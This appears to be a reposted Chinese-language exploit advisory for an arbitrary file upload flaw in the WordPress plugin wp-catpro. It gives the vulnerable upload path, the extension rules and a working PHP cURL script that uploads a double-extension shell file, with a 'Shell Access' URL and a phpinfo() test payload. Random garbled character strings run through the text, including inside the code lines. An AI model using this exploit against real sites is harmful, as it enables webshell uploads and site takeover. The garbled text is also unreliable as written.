WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
" N! N' v  Q) L7 A/ N9 M#-----------------------------------------------------------------------
4 R( j  i% j/ q5 C8 V( I4 O
作者  => Zikou-16
- W, X7 U6 u7 X% R邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
4 I" }0 d  l+ I' \下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
, x. B/ i: ?% t####
. \. ]. v+ @; @. s) M
#=> Exploit 信息:
5 Z  A$ w; c' B: w2 |------------------
# 攻击者可以上传 file/shell.php.gif
+ U; K! e. P+ ]4 _+ n: {2 q# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
7 p& l, i% n- f0 {( B# \( y3 _# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

7 x$ U% l9 l& ~- K' O; k#=> Exploit
! w  P6 G- z# M1 `$ @-----------
<?php

$uploadfile="zik.php.gif";
  {: `; f6 a7 x9 w& N; f$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
/ }$ o$ x6 [% d3 s( kcurl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
5 U: C! K$ ]8 o8 F: v'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
+ a& u1 j7 c  H, h5 }: F6 Ycurl_close($ch);

print "$postResult";

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
/ t# `" y3 r$ R+ Z! K; g  ?>
4 |; |& |. O- H$ G; P2 N1 P$ q<?php
# \( H5 [3 `+ O% A0 L# Y. p, e+ mphpinfo();
?>